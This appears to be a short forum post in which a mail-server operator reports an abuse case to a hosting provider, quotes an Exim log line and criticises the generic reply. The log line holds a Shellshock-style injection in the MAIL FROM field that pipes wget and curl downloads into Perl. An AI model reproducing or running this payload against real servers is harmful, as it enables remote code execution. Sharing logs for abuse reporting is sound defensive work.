I emailed abuse()hetzner.com:


Your user at hosts malware to exploit vulnerability in
mail (SMTP) servers. In the log of my Exim:

2023-01-17 00:33:40 +0200 SMTP call from newcloud.thevinylspectrum.com (x) 
[] dropped: too many syntax or protocol errors (last command was 
"MAIL FROM:<() { :; }; wget -qO -|perl;curl -sS|perl>",  C=HELO,MAIL)


20 days (!) later I received a reply [AbuseID:BEA948:23]:


We have received your information regarding spam and/or abuse and we shall 
follow up on this matter.

The person responsible has been sent the following instructions:
- Solve the issue
- Send us a response


My conclusion is that Hetzner is a heaven for spammers.

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